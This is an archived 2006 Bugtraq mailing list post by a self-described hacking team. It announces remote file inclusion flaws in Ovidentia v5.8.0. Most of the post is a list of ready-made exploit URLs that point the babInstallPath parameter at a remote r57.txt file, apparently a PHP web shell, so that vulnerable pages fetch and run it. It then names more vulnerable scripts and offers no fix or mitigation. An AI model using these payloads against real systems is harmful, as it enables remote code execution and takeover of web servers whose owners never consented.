lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 01 Jun 2006 01:49:54 +0300
From: "black code" <black-cod3@...mail.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com,
	bugtraq@...ph3us.org, content@...uritydot.net,
	listadmin@...urityfocus.com, MAILER-DAEMON@...ta.fr,
	MAILER-DAEMON@...lex05.paran.com, postmaster@...an.com,
	root@...uritydot.net, str0ke@...w0rm.com, submit@...w0rm.com,
	webmaster@...urityfocus.com
Subject: multiple file inclusion exploits in ovidentia v5.8.0


multiple file inclusion exploits in ovidentia v5.8.0

forum type : ovidentia v5.8.0
bug found by : black-code&sweet-devil
team : site-down
type : file include

####################################################
exploits :


http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?



And more pages are vulnerabe in the directory  /ovidentia/ with the same 
variable,

as an example :

login.php

frchart.php

flbchart.php

fileman.php

faq.php

event.php

directory.php

articles.php

artedit.php

approb.php

calday.php


And more .. ;)



####################################################



#######################
emails:

black-cod3@...mail.com  &  gamr-14@...mail.com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

Powered by blists - more mailing lists